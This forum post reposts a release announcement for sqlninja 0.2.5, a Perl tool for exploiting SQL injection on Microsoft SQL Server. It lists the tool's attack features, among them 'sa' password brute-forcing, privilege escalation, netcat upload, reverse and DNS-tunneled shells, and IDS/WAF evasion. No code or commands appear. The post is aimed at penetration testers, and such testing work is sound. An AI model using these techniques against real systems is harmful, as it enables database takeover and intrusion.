Jump to content
begood

sqlninja 0.2.5 released!

By begood, in Programe hacking

Recommended Posts

begood Newbie

begood

Posted
Posted

Hello security enthusiasts,

It's been 2 years, but a new version of sqlninja is out at Sourceforge!

Introduction

============

Sqlninja is a tool to exploit SQL Injection vulnerabilities on a web

application that uses Microsoft SQL Server as its back-end. Its main

goal is to provide an interactive access on the vulnerable DB server,

even in a very hostile environment. It should be used by penetration

testers to help and automate the process of taking over a DB Server when

a SQL Injection vulnerability has been discovered. It is written in

Perl, it is released under the GPLv2 and so far has been successfully

tested on:

- Linux

- FreeBSD

- Mac OS X

You can find it, together with a flash demo of its features, at the

address http://sqlninja.sourceforge.net

What's new

==========

# Proxy support (it was about time!)

# No more 64k bytes limit in upload mode

# Upload mode is also massively faster

# Privilege escalation through token kidnapping (kudos to Cesar Cerrudo)

# Other minor improvements

What's not so new

=================

# Fingerprint of the remote SQL Server (version, user performing the

queries, user privileges, xp_cmdshell availability, DB authentication mode)

# Bruteforce of 'sa' password (in 2 flavors: dictionary-based and

incremental)

# Privilege escalation to sysadmin group if 'sa' password has been found

# Creation of a custom xp_cmdshell if the original one has been removed

# Upload of netcat (or any other executable) using only normal HTTP

requests (no FTP/TFTP needed)

# TCP/UDP portscan from the target SQL Server to the attacking machine,

in order to find a port that is allowed by the firewall of the target

network and use it for a reverse shell

# Direct and reverse bindshell, both TCP and UDP

# DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a

direct/reverse shell, but the DB server can resolve external hostnames

(check the documentation for details about how this works)

# Evasion techniques to confuse a few IDS/IPS/WAF

# Integration with Metasploit3, to obtain a graphical access to the

remote DB server through a VNC server injection

Happy hacking !

--

Full Disclosure: sqlninja 0.2.5 released!

icesurfer

  • Upvote 1

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...